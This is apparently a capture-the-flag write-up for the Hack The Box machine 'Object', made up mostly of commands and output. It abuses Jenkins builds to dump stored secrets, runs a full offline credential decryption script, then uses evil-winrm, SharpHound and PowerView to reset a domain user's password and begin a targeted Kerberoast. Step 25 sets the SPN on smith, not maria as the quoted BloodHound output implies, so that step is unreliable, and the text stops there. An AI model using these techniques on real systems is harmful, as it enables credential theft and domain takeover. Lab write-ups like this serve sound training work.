Object-htb-writeup

0x00 Skills covered

Skills in this chapter: generating a Jenkins API token, triggering builds with the token, reading Jenkins credential config files, decrypting stored Jenkins passwords, domain enumeration, abusing ForceChangePassword with Set-DomainUserPassword, GenericWrite over domain objects, targeted Kerberoasting, PowerView.ps1, hunting for sensitive files, the fact that an object's owner retains the right to modify its security descriptor regardless of the DACL, abusing ownership of an object, and chaining several domain user accounts laterally.

Reference: https://0xdf.gitlab.io/2022/02/28/htb-object.html

Reference: https://brsalcedom.github.io/Object-Writeup-HackTheBox/#consola-como-smith

Reference: https://grav3m1nd-byte.gitbook.io/htb-resources/htb-retired-boxes/object#account-modification

0x01 User-level access

1. Target IP: 10.10.11.132

2. Port scan:

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p- --min-rate=10000 10.10.11.132 -oG allports -Pn
[sudo] password for kali:
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-16 05:41 CST
Nmap scan report for 10.10.11.132
Host is up (0.29s latency).
Not shown: 65532 filtered tcp ports (no-response)
PORT STATE SERVICE
80/tcp open http
5985/tcp open wsman
8080/tcp open http-proxy

Nmap done: 1 IP address (1 host up) scanned in 21.01 seconds

┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo nmap -p80,5985,8080 -sC -sV --min-rate=10000 10.10.11.132
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-04-16 05:42 CST
Nmap scan report for 10.10.11.132
Host is up (0.24s latency).

PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 10.0
|_http-title: Mega Engines
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8080/tcp open http Jetty 9.4.43.v20210629
|_http-title: Site doesn't have a title (text/html;charset=utf-8).
|_http-server-header: Jetty(9.4.43.v20210629)
| http-robots.txt: 1 disallowed entry
|_/
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 22.44 seconds

3. Only three ports are open, so take a quick look at each

http://10.10.11.132/

4. Port 80 is a single static page with nothing else of interest, but it reveals the hostname object.htb, which we add to /etc/hosts

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo "10.10.11.132 object.htb" | sudo tee -a /etc/hosts
[sudo] password for kali:
10.10.11.132 object.htb

5. Next, the service on port 8080

http://10.10.11.132:8080/login?from=%2F

6. This is Jenkins, and self-registration is open, so create an account:

username: shiyan
password: shiyan

7. After logging in, the version is shown in the footer

http://10.10.11.132:8080/

Jenkins 2.317

8. The user's configuration page lets us generate an API token

http://10.10.11.132:8080/user/shiyan/configure

115015ba38e9393b9ddcad289ec547880c

With an API token, a job can be triggered remotely without the web UI. The USERNAME:TOKEN pair is HTTP basic auth using the API token as the password; the token= query parameter is a different value, the job's own "Trigger builds remotely" authentication token set in the job configuration:

http://[USERNAME]:[TOKEN]@[JENKINS-URL]/job/test/build?token=[TOKEN_NAME]

9. A throwaway freestyle project named test is created. This account cannot start a build from the UI, so the remote trigger with the API token is the only way to run it

http://10.10.11.132:8080/job/test/

10. The build runs but errors out (the screenshot is not reproduced here), so the job configuration is adjusted and the build is triggered again with curl. The same value is used as the API token (basic auth) and as the job's remote trigger token:
┌──(kali㉿offsec)-[~/Desktop]
└─$ curl http://shiyan:115015ba38e9393b9ddcad289ec547880c@object.htb:8080/job/test/build?token=115015ba38e9393b9ddcad289ec547880c

11. Start with a harmless build step, a batch command that runs whoami

http://10.10.11.132:8080/job/test/configure

Started by remote host 10.10.14.38
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test
[test] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins8150549222580674392.bat

C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test>whoami
object\oliver

C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test>exit 0
Finished: SUCCESS

12. Normally the next step would be a reverse shell, but outbound connections are blocked by the host firewall, so another route is needed. Build steps run as oliver with the Jenkins home directory (C:\Users\oliver\AppData\Local\Jenkins\.jenkins) readable, and enumerating it turns up stored credentials in the admin user's config.xml

http://10.10.11.132:8080/job/test/4/console

Started by remote host 10.10.14.38
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test
[test] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins12376131197523855501.bat

C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test>type ..\..\users\admin_17207690984073220035\config.xml
<?xml version='1.1' encoding='UTF-8'?>
<user>
<version>10</version>
<id>admin</id>
<fullName>admin</fullName>
<properties>
<com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty plugin="credentials@2.6.1">
<domainCredentialsMap class="hudson.util.CopyOnWriteMap$Hash">
<entry>
<com.cloudbees.plugins.credentials.domains.Domain>
<specifications/>
</com.cloudbees.plugins.credentials.domains.Domain>
<java.util.concurrent.CopyOnWriteArrayList>
<com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl>
<id>320a60b9-1e5c-4399-8afe-44466c9cde9e</id>
<description></description>
<username>oliver</username>
<password>{AQAAABAAAAAQqU+m+mC6ZnLa0+yaanj2eBSbTk+h4P5omjKdwV17vcA=}</password>
<usernameSecret>false</usernameSecret>
</com.cloudbees.plugins.credentials.impl.UsernamePasswordCredentialsImpl>
</java.util.concurrent.CopyOnWriteArrayList>
</entry>
</domainCredentialsMap>
</com.cloudbees.plugins.credentials.UserCredentialsProvider_-UserCredentialsProperty>
<hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty plugin="email-ext@2.84">
<triggers/>
</hudson.plugins.emailext.watching.EmailExtWatchAction_-UserProperty>
<hudson.model.MyViewsProperty>
<views>
<hudson.model.AllView>
<owner class="hudson.model.MyViewsProperty" reference="../../.."/>
<name>all</name>
<filterExecutors>false</filterExecutors>
<filterQueue>false</filterQueue>
<properties class="hudson.model.View$PropertyList"/>
</hudson.model.AllView>
</views>
</hudson.model.MyViewsProperty>
<org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty plugin="display-url-api@2.3.5">
<providerId>default</providerId>
</org.jenkinsci.plugins.displayurlapi.user.PreferredProviderUserProperty>
<hudson.model.PaneStatusProperties>
<collapsed/>
</hudson.model.PaneStatusProperties>
<jenkins.security.seed.UserSeedProperty>
<seed>ea75b5bd80e4763e</seed>
</jenkins.security.seed.UserSeedProperty>
<hudson.search.UserSearchProperty>
<insensitiveSearch>true</insensitiveSearch>
</hudson.search.UserSearchProperty>
<hudson.model.TimeZoneProperty/>
<hudson.security.HudsonPrivateSecurityRealm_-Details>
<passwordHash>#jbcrypt:$2a$10$q17aCNxgciQt8S246U4ZauOccOY7wlkDih9b/0j4IVjZsdjUNAPoW</passwordHash>
</hudson.security.HudsonPrivateSecurityRealm_-Details>
<hudson.tasks.Mailer_-UserProperty plugin="mailer@1.34">
<emailAddress>admin@object.local</emailAddress>
</hudson.tasks.Mailer_-UserProperty>
<jenkins.security.ApiTokenProperty>
<tokenStore>
<tokenList/>
</tokenStore>
</jenkins.security.ApiTokenProperty>
<jenkins.security.LastGrantedAuthoritiesProperty>
<roles>
<string>authenticated</string>
</roles>
<timestamp>1634793332195</timestamp>
</jenkins.security.LastGrantedAuthoritiesProperty>
</properties>
</user>
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test>exit 0
Finished: SUCCESS

13. The <password> value in braces is not a hash but a Jenkins-encrypted secret, and it can be decrypted offline (the #jbcrypt value below it is the bcrypt hash of the admin's Jenkins login and is unrelated). Two GitHub repositories implement the decryption: one written in Go, and pwn_jenkins, a collection of Python scripts for attacking Jenkins. Both need the config.xml that holds the secret plus two files from the secrets/ directory under the Jenkins home, master.key and hudson.util.Secret, so fetch those next

http://10.10.11.132:8080/job/test/5/console

Started by remote host 10.10.14.38
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test
[test] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins6146753930529494803.bat

C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test>type ..\..\secrets\master.key
f673fdb0c4fcc339070435bdbe1a039d83a597bf21eafbb7f9b35b50fce006e564cff456553ed73cb1fa568b68b310addc576f1637a7fe73414a4c6ff10b4e23adc538e9b369a0c6de8fc299dfa2a3904ec73a24aa48550b276be51f9165679595b2cac03cc2044f3c702d677169e2f4d3bd96d8321a2e19e2bf0c76fe31db19
C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test>exit 0
Finished: SUCCESS


http://10.10.11.132:8080/job/test/6/console

Started by remote host 10.10.14.38
Running as SYSTEM
Building in workspace C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test
[test] $ cmd /c call C:\Users\oliver\AppData\Local\Temp\jenkins788743132202005773.bat

C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test>powershell -c [convert]::ToBase64String((cat ..\..\secrets\hudson.util.Secret -Encoding byte))
gWFQFlTxi+xRdwcz6KgADwG+rsOAg2e3omR3LUopDXUcTQaGCJIswWKIbqgNXAvu2SHL93OiRbnEMeKqYe07PqnX9VWLh77Vtf+Z3jgJ7sa9v3hkJLPMWVUKqWsaMRHOkX30Qfa73XaWhe0ShIGsqROVDA1gS50ToDgNRIEXYRQWSeJY0gZELcUFIrS+r+2LAORHdFzxUeVfXcaalJ3HBhI+Si+pq85MKCcY3uxVpxSgnUrMB5MX4a18UrQ3iug9GHZQN4g6iETVf3u6FBFLSTiyxJ77IVWB1xgep5P66lgfEsqgUL9miuFFBzTsAkzcpBZeiPbwhyrhy/mCWogCddKudAJkHMqEISA3et9RIgA=

C:\Users\oliver\AppData\Local\Jenkins\.jenkins\workspace\test>exit 0
Finished: SUCCESS

14. Now run the decryptor from the repository below. master.key (a hex string) and config.xml can be pasted straight into files, but hudson.util.Secret is binary, which is why it was dumped as base64 above and must be decoded back before use

https://github.com/gquere/pwn_jenkins/tree/master/offline_decryption

┌──(kali㉿offsec)-[~/Desktop]
└─$ echo gWFQFlTxi+xRdwcz6KgADwG+rsOAg2e3omR3LUopDXUcTQaGCJIswWKIbqgNXAvu2SHL93OiRbnEMeKqYe07PqnX9VWLh77Vtf+Z3jgJ7sa9v3hkJLPMWVUKqWsaMRHOkX30Qfa73XaWhe0ShIGsqROVDA1gS50ToDgNRIEXYRQWSeJY0gZELcUFIrS+r+2LAORHdFzxUeVfXcaalJ3HBhI+Si+pq85MKCcY3uxVpxSgnUrMB5MX4a18UrQ3iug9GHZQN4g6iETVf3u6FBFLSTiyxJ77IVWB1xgep5P66lgfEsqgUL9miuFFBzTsAkzcpBZeiPbwhyrhy/mCWogCddKudAJkHMqEISA3et9RIgA= | base64 -d > hudson.util.Secret

┌──(kali㉿offsec)-[~/Desktop]
└─$ python3 ./jenkins_offline_decrypt.py master.key hudson.util.Secret config.xml
c1cdfun_d2434
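What the decryptor above actually does, as an added worked example written for this page (it is not the author's code and not pwn_jenkins): SHA-256 of the master.key text truncated to 16 bytes is the AES key that unlocks secrets/hudson.util.Secret (AES-ECB, plaintext terminated by ::::MAGIC::::); the first 16 bytes of that plaintext are the key every stored credential is encrypted with; and a {...} secret is base64 of 0x01 | IV length | data length | IV | AES-CBC ciphertext. The three artefacts dumped from the target above are embedded as constants so the script runs offline and reproduces oliver's password. Assumptions: either the cryptography package or pycryptodome is installed for AES, and all function and constant names are mine.

```python
"""Offline decryption of Jenkins stored credentials (added example)."""
import base64
import hashlib
import re

MAGIC = b"::::MAGIC::::"   # Jenkins appends this to every ConfidentialStore payload


def aes_decrypt(key, data, iv=None):
    """Raw AES-128 decrypt: ECB when iv is None, CBC otherwise. No unpadding here.
    Assumes either 'cryptography' or pycryptodome is installed."""
    try:
        from cryptography.hazmat.backends import default_backend
        from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
        mode = modes.ECB() if iv is None else modes.CBC(iv)
        dec = Cipher(algorithms.AES(key), mode, default_backend()).decryptor()
        return dec.update(data) + dec.finalize()
    except ImportError:
        from Crypto.Cipher import AES
        if iv is None:
            return AES.new(key, AES.MODE_ECB).decrypt(data)
        return AES.new(key, AES.MODE_CBC, iv).decrypt(data)


def master_aes_key(master_key_text):
    """secrets/master.key holds a hex string; Jenkins derives the AES key as
    SHA-256 of that text, truncated to 16 bytes."""
    return hashlib.sha256(master_key_text.strip().encode()).digest()[:16]


def confidentiality_key(master_key_text, hudson_util_secret):
    """Decrypt secrets/hudson.util.Secret (AES-ECB under the master key). The
    plaintext is 256 random bytes followed by MAGIC; only its first 16 bytes
    are used as the key for stored credentials."""
    plain = aes_decrypt(master_aes_key(master_key_text), hudson_util_secret)
    if MAGIC not in plain:
        raise ValueError("master.key does not match hudson.util.Secret")
    return plain[:16]


def decrypt_secret(key, encoded):
    """Decrypt one stored secret.
    '{base64}' is the v1 format: 0x01 | iv_len (4, BE) | data_len (4, BE) | iv |
    AES-CBC ciphertext with PKCS#5 padding. A bare base64 string is the legacy
    AES-ECB format whose plaintext is terminated by MAGIC."""
    if encoded.startswith("{") and encoded.endswith("}"):
        raw = base64.b64decode(encoded[1:-1])
        if raw[0] != 1:
            raise ValueError("unknown payload version %d" % raw[0])
        iv_len = int.from_bytes(raw[1:5], "big")
        data_len = int.from_bytes(raw[5:9], "big")
        iv = raw[9:9 + iv_len]
        ct = raw[9 + iv_len:9 + iv_len + data_len]
        plain = aes_decrypt(key, ct, iv)
        return plain[:-plain[-1]]               # strip PKCS#5 padding
    plain = aes_decrypt(key, base64.b64decode(encoded))
    if MAGIC not in plain:
        raise ValueError("legacy secret did not decrypt cleanly")
    return plain.split(MAGIC)[0]


def decrypt_config(key, xml_text):
    """Decrypt every '{...}' secret that sits directly inside an XML element
    (<password>, <privateKey>, <secret>, ...) and return {tag: plaintext}."""
    found = {}
    for tag, token in re.findall(r"<(\w+)>(\{[A-Za-z0-9+/=]+\})</\1>", xml_text):
        found[tag] = decrypt_secret(key, token).decode("utf-8", "replace")
    return found


# The three artefacts dumped from the target earlier in this write-up.
MASTER_KEY = ("f673fdb0c4fcc339070435bdbe1a039d83a597bf21eafbb7f9b35b50fce006e5"
              "64cff456553ed73cb1fa568b68b310addc576f1637a7fe73414a4c6ff10b4e23"
              "adc538e9b369a0c6de8fc299dfa2a3904ec73a24aa48550b276be51f91656795"
              "95b2cac03cc2044f3c702d677169e2f4d3bd96d8321a2e19e2bf0c76fe31db19")
HUDSON_UTIL_SECRET_B64 = (
    "gWFQFlTxi+xRdwcz6KgADwG+rsOAg2e3omR3LUopDXUcTQaGCJIswWKIbqgNXAvu"
    "2SHL93OiRbnEMeKqYe07PqnX9VWLh77Vtf+Z3jgJ7sa9v3hkJLPMWVUKqWsaMRHO"
    "kX30Qfa73XaWhe0ShIGsqROVDA1gS50ToDgNRIEXYRQWSeJY0gZELcUFIrS+r+2L"
    "AORHdFzxUeVfXcaalJ3HBhI+Si+pq85MKCcY3uxVpxSgnUrMB5MX4a18UrQ3iug9"
    "GHZQN4g6iETVf3u6FBFLSTiyxJ77IVWB1xgep5P66lgfEsqgUL9miuFFBzTsAkzc"
    "pBZeiPbwhyrhy/mCWogCddKudAJkHMqEISA3et9RIgA=")
ADMIN_CONFIG_XML = """<user>
  <username>oliver</username>
  <password>{AQAAABAAAAAQqU+m+mC6ZnLa0+yaanj2eBSbTk+h4P5omjKdwV17vcA=}</password>
  <passwordHash>#jbcrypt:$2a$10$q17aCNxgciQt8S246U4ZauOccOY7wlkDih9b/0j4IVjZsdjUNAPoW</passwordHash>
</user>"""


def recover_oliver_password():
    key = confidentiality_key(MASTER_KEY, base64.b64decode(HUDSON_UTIL_SECRET_B64))
    return decrypt_config(key, ADMIN_CONFIG_XML)["password"]


if __name__ == "__main__":
    print(recover_oliver_password())
```

Against a live Jenkins home, read the three files from disk instead of the constants. The same confidentiality key also unlocks credentials.xml and per-job config.xml files, and decrypt_config picks those secrets up as long as each one sits directly inside an element.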

15. The recovered password works for oliver over WinRM with evil-winrm

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.11.132 -u oliver -p 'c1cdfun_d2434'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\oliver\Documents> whoami
object\oliver
*Evil-WinRM* PS C:\Users\oliver\Documents>

16. Grab the first flag

*Evil-WinRM* PS C:\Users\oliver\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\oliver\Desktop> ls


Directory: C:\Users\oliver\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/15/2024 6:33 AM 34 user.txt


*Evil-WinRM* PS C:\Users\oliver\Desktop> cat user.txt
653debfc344c3d0a1b56dca26504176d
*Evil-WinRM* PS C:\Users\oliver\Desktop>

0x02 System-level access

17. Continue with manual enumeration

*Evil-WinRM* PS C:\Users\oliver\Desktop> ls C:/Users


Directory: C:\Users


Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 11/10/2021 3:20 AM Administrator
d----- 10/26/2021 7:59 AM maria
d----- 10/26/2021 7:58 AM oliver
d-r--- 4/10/2020 10:49 AM Public
d----- 10/21/2021 3:44 AM smith


*Evil-WinRM* PS C:\Users\oliver\Desktop>

*Evil-WinRM* PS C:\Users\oliver\Desktop> netstat -an | findstr LISTENING
TCP 0.0.0.0:80 0.0.0.0:0 LISTENING
TCP 0.0.0.0:88 0.0.0.0:0 LISTENING
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING
TCP 0.0.0.0:389 0.0.0.0:0 LISTENING
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING
TCP 0.0.0.0:464 0.0.0.0:0 LISTENING
TCP 0.0.0.0:593 0.0.0.0:0 LISTENING
TCP 0.0.0.0:636 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3268 0.0.0.0:0 LISTENING
TCP 0.0.0.0:3269 0.0.0.0:0 LISTENING
TCP 0.0.0.0:5985 0.0.0.0:0 LISTENING
TCP 0.0.0.0:8080 0.0.0.0:0 LISTENING
TCP 0.0.0.0:9389 0.0.0.0:0 LISTENING
TCP 0.0.0.0:47001 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49664 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49665 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49666 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49667 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49673 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49674 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49679 0.0.0.0:0 LISTENING
TCP 0.0.0.0:49747 0.0.0.0:0 LISTENING
TCP 0.0.0.0:55858 0.0.0.0:0 LISTENING
TCP 10.10.11.132:53 0.0.0.0:0 LISTENING
TCP 10.10.11.132:139 0.0.0.0:0 LISTENING
TCP 127.0.0.1:53 0.0.0.0:0 LISTENING
TCP [::]:80 [::]:0 LISTENING
TCP [::]:88 [::]:0 LISTENING
TCP [::]:135 [::]:0 LISTENING
TCP [::]:445 [::]:0 LISTENING
TCP [::]:464 [::]:0 LISTENING
TCP [::]:593 [::]:0 LISTENING
TCP [::]:3268 [::]:0 LISTENING
TCP [::]:3269 [::]:0 LISTENING
TCP [::]:5985 [::]:0 LISTENING
TCP [::]:8080 [::]:0 LISTENING
TCP [::]:9389 [::]:0 LISTENING
TCP [::]:47001 [::]:0 LISTENING
TCP [::]:49664 [::]:0 LISTENING
TCP [::]:49665 [::]:0 LISTENING
TCP [::]:49666 [::]:0 LISTENING
TCP [::]:49667 [::]:0 LISTENING
TCP [::]:49673 [::]:0 LISTENING
TCP [::]:49674 [::]:0 LISTENING
TCP [::]:49679 [::]:0 LISTENING
TCP [::]:49747 [::]:0 LISTENING
TCP [::]:55858 [::]:0 LISTENING
TCP [::1]:53 [::]:0 LISTENING
TCP [dead:beef::120]:53 [::]:0 LISTENING
TCP [dead:beef::1572:9538:46ab:f370]:53 [::]:0 LISTENING
TCP [fe80::1572:9538:46ab:f370%12]:53 [::]:0 LISTENING
*Evil-WinRM* PS C:\Users\oliver\Desktop>

# Ports 53, 88, 389, 636, 3268/3269 and 9389 are listening (DNS, Kerberos, LDAP/LDAPS, global catalog, AD Web Services): this host looks like a domain controller. Confirm:

*Evil-WinRM* PS C:\Users\oliver\Desktop> net time /domain
Current time at \\jenkins.object.local is 4/15/2024 6:53:43 AM

The command completed successfully.

*Evil-WinRM* PS C:\Users\oliver\Desktop>

18. It is indeed a domain, and the DC is this very host (jenkins.object.local), so standard AD enumeration applies


19. Automated enumeration with SharpHound

*Evil-WinRM* PS C:\Users\oliver\Desktop> upload /home/kali/Desktop/tools/SharpHound/SharpHound.exe

Info: Uploading /home/kali/Desktop/tools/SharpHound/SharpHound.exe to C:\Users\oliver\Desktop\SharpHound.exe

Data: 1395368 bytes of 1395368 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\oliver\Desktop> ls


Directory: C:\Users\oliver\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/15/2024 7:15 AM 1046528 SharpHound.exe
-ar--- 4/15/2024 6:33 AM 34 user.txt


*Evil-WinRM* PS C:\Users\oliver\Desktop> .\SharpHound.exe --CollectionMethods All --Domain object.local
2024-04-15T07:16:03.2966810-07:00|INFORMATION|This version of SharpHound is compatible with the 4.3.1 Release of BloodHound
2024-04-15T07:16:03.3904292-07:00|INFORMATION|Resolved Collection Methods: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-04-15T07:16:03.4060550-07:00|INFORMATION|Initializing SharpHound at 7:16 AM on 4/15/2024
2024-04-15T07:16:06.0623044-07:00|INFORMATION|[CommonLib LDAPUtils]Found usable Domain Controller for object.local : jenkins.object.local
2024-04-15T07:16:06.3904396-07:00|INFORMATION|Flags: Group, LocalAdmin, GPOLocalGroup, Session, LoggedOn, Trusts, ACL, Container, RDP, ObjectProps, DCOM, SPNTargets, PSRemote
2024-04-15T07:16:06.4841787-07:00|INFORMATION|Beginning LDAP search for object.local
2024-04-15T07:16:06.4998160-07:00|INFORMATION|Producer has finished, closing LDAP channel
2024-04-15T07:16:06.4998160-07:00|INFORMATION|LDAP channel closed, waiting for consumers
2024-04-15T07:16:37.0623170-07:00|INFORMATION|Status: 0 objects finished (+0 0)/s -- Using 35 MB RAM
2024-04-15T07:16:51.8123063-07:00|INFORMATION|Consumers finished, closing output channel
2024-04-15T07:16:51.8279309-07:00|INFORMATION|Output channel closed, waiting for output task to complete
Closing writers
2024-04-15T07:16:51.8748068-07:00|INFORMATION|Status: 92 objects finished (+92 2.044445)/s -- Using 42 MB RAM
2024-04-15T07:16:51.8748068-07:00|INFORMATION|Enumeration finished in 00:00:45.3979747
2024-04-15T07:16:51.9216799-07:00|INFORMATION|Saving cache with stats: 52 ID to type mappings.
52 name to SID mappings.
0 machine sid mappings.
2 sid to domain mappings.
0 global catalog mappings.
2024-04-15T07:16:51.9373076-07:00|INFORMATION|SharpHound Enumeration Completed at 7:16 AM on 4/15/2024! Happy Graphing!
*Evil-WinRM* PS C:\Users\oliver\Desktop> ls


Directory: C:\Users\oliver\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/15/2024 7:16 AM 11433 20240415071651_BloodHound.zip
-a---- 4/15/2024 7:16 AM 7897 MWU2MmE0MDctMjBkZi00N2VjLTliOTMtYThjYTY4MjdhZDA2.bin
-a---- 4/15/2024 7:15 AM 1046528 SharpHound.exe
-ar--- 4/15/2024 6:33 AM 34 user.txt


*Evil-WinRM* PS C:\Users\oliver\Desktop> download 20240415071651_BloodHound.zip

Info: Downloading C:\Users\oliver\Desktop\20240415071651_BloodHound.zip to 20240415071651_BloodHound.zip

Info: Download successful!
*Evil-WinRM* PS C:\Users\oliver\Desktop>

20. After importing the ZIP into BloodHound, mark oliver as owned and look at what he controls outbound.

21. BloodHound shows that OLIVER@OBJECT.LOCAL has ForceChangePassword over SMITH@OBJECT.LOCAL: oliver can reset smith's password without knowing the current one. BloodHound's abuse info for the edge:

There are at least two ways to execute this attack. The first and most obvious is by using the built-in net.exe binary in Windows (e.g.: net user dfm.a Password123! /domain). See the opsec considerations tab for why this may be a bad idea. The second, and highly recommended method, is by using the Set-DomainUserPassword function in PowerView. This function is superior to using the net.exe binary in several ways. For instance, you can supply alternate credentials, instead of needing to run a process as or logon as the user with the ForceChangePassword privilege. Additionally, you have much safer execution options than you do with spawning net.exe (see the opsec tab).


To abuse this privilege with PowerView's Set-DomainUserPassword, first import PowerView into your agent session or into a PowerShell instance at the console. You may need to authenticate to the Domain Controller as OLIVER@OBJECT.LOCAL if you are not running a process as that user. To do this in conjunction with Set-DomainUserPassword, first create a PSCredential object (these examples come from the PowerView help documentation):

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

Then create a secure string object for the password you want to set on the target user:

$UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

Finally, use Set-DomainUserPassword, optionally specifying $Cred if you are not already running a process as OLIVER@OBJECT.LOCAL:

Set-DomainUserPassword -Identity andy -AccountPassword $UserPassword -Credential $Cred

Now that you know the target user's plain text password, you can either start a new agent as that user, or use that user's credentials in conjunction with PowerView's ACL abuse functions, or perhaps even RDP to a system the target user has access to. For more ideas and information, see the references tab.

22. Upload PowerView and reset smith's password:

*Evil-WinRM* PS C:\Users\oliver\Desktop> upload /home/kali/Desktop/tools/PowerSploit/PowerView.ps1

Info: Uploading /home/kali/Desktop/tools/PowerSploit/PowerView.ps1 to C:\Users\oliver\Desktop\PowerView.ps1

Data: 1027036 bytes of 1027036 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\oliver\Desktop> ls


Directory: C:\Users\oliver\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 4/15/2024 7:16 AM 11433 20240415071651_BloodHound.zip
-a---- 4/15/2024 7:16 AM 7897 MWU2MmE0MDctMjBkZi00N2VjLTliOTMtYThjYTY4MjdhZDA2.bin
-a---- 4/15/2024 7:31 AM 770279 PowerView.ps1
-a---- 4/15/2024 7:15 AM 1046528 SharpHound.exe
-ar--- 4/15/2024 6:33 AM 34 user.txt


*Evil-WinRM* PS C:\Users\oliver\Desktop> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\Users\oliver\Desktop> $SecPassword = ConvertTo-SecureString 'c1cdfun_d2434' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\oliver\Desktop> $Cred = New-Object System.Management.Automation.PSCredential('OBJECT.LOCAL\oliver', $SecPassword)
*Evil-WinRM* PS C:\Users\oliver\Desktop> $UserPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
*Evil-WinRM* PS C:\Users\oliver\Desktop> Set-DomainUserPassword -Identity smith -AccountPassword $UserPassword -Credential $Cred
*Evil-WinRM* PS C:\Users\oliver\Desktop>

23. The password reset succeeds and we can log in as smith

┌──(kali㉿offsec)-[~/Desktop]
└─$ evil-winrm -i 10.10.11.132 -u smith -p 'Password123!'

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\smith\Documents> whoami
object\smith
*Evil-WinRM* PS C:\Users\smith\Documents>

24. Next hop. BloodHound's abuse info for smith:

The user SMITH@OBJECT.LOCAL has generic write access to the user MARIA@OBJECT.LOCAL.

Generic Write access grants you the ability to write to any non-protected attribute on the target object, including "members" for a group, and "serviceprincipalnames" for a user.


A targeted Kerberoast attack can be performed using PowerView's Set-DomainObject along with Get-DomainSPNTicket.

You may need to authenticate to the Domain Controller as SMITH@OBJECT.LOCAL if you are not running a process as that user. To do this in conjunction with Set-DomainObject, first create a PSCredential object (these examples come from the PowerView help documentation):

$SecPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force

$Cred = New-Object System.Management.Automation.PSCredential('TESTLAB\dfm.a', $SecPassword)

Then, use Set-DomainObject, optionally specifying $Cred if you are not already running a process as SMITH@OBJECT.LOCAL:

Set-DomainObject -Credential $Cred -Identity harmj0y -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}

After running this, you can use Get-DomainSPNTicket as follows:

Get-DomainSPNTicket -Credential $Cred harmj0y | fl

The recovered hash can be cracked offline using the tool of your choice. Cleanup of the ServicePrincipalName can be done with the Set-DomainObject command:

Set-DomainObject -Credential $Cred -Identity harmj0y -Clear serviceprincipalname

25. We already have a session as smith, so try the targeted Kerberoast directly

*Evil-WinRM* PS C:\Users\smith\Documents> upload /home/kali/Desktop/tools/PowerSploit/PowerView.ps1

Info: Uploading /home/kali/Desktop/tools/PowerSploit/PowerView.ps1 to C:\Users\smith\Documents\PowerView.ps1

Data: 1027036 bytes of 1027036 bytes copied

Info: Upload successful!
*Evil-WinRM* PS C:\Users\smith\Documents> Import-Module .\PowerView.ps1
*Evil-WinRM* PS C:\Users\smith\Documents> Set-DomainObject -Identity smith -SET @{serviceprincipalname='nonexistent/BLAHBLAH'}
